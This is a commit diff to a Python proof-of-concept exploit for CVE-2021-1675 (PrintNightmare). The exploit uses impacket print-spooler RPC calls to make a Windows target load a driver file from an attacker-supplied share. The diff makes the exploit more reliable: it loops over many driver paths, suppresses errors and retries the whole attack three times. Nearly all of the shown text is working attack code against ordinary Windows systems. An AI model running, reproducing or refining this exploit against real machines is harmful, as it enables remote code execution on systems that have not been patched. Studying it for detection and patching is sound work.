Browse Source

Increased PoC stability

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
pull/21/head
cube0x0 11 months ago
parent
commit
86152766a0
  1. 43
      CVE-2021-1675.py

43
CVE-2021-1675.py

@ -3,7 +3,7 @@ from impacket.dcerpc.v5 import rprn @@ -3,7 +3,7 @@ from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5 import transport
import argparse
import sys
import time
def connect(username, password, domain, lmhash, nthash, address, port):
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
@ -50,29 +50,19 @@ def main(username, password, domain, lmhash, nthash, address, port, share): @@ -50,29 +50,19 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
print("[*] Uploading {0}".format(share))
#stage 0
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage0: {0}".format(resp['ErrorCode']))
#stage 1
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\{0}\x00".format(filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage1: {0}".format(resp['ErrorCode']))
#stage 2
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\2\\{0}\x00".format(filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage2: {0}".format(resp['ErrorCode']))
#stage 3
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\3\\{0}\x00".format(filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage3: {0}".format(resp['ErrorCode']))
if (resp['ErrorCode'] == 0):
print("[+] Exploit Completed")
else:
print("[-] Not Completed")
for i in range(1, 50):
try:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
if (resp['ErrorCode'] == 0):
print("[+] Exploit Completed")
sys.exit()
except Exception as e:
#print(e)
pass
if __name__ == '__main__':
@ -122,5 +112,12 @@ Example; @@ -122,5 +112,12 @@ Example;
lmhash = ''
nthash = ''
#re-run if stage0/stageX fails
print("[*] Try 1...")
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
time.sleep(10)
print("[*] Try 2...")
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
time.sleep(10)
print("[*] Try 3...")
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
Loading…
Cancel
Save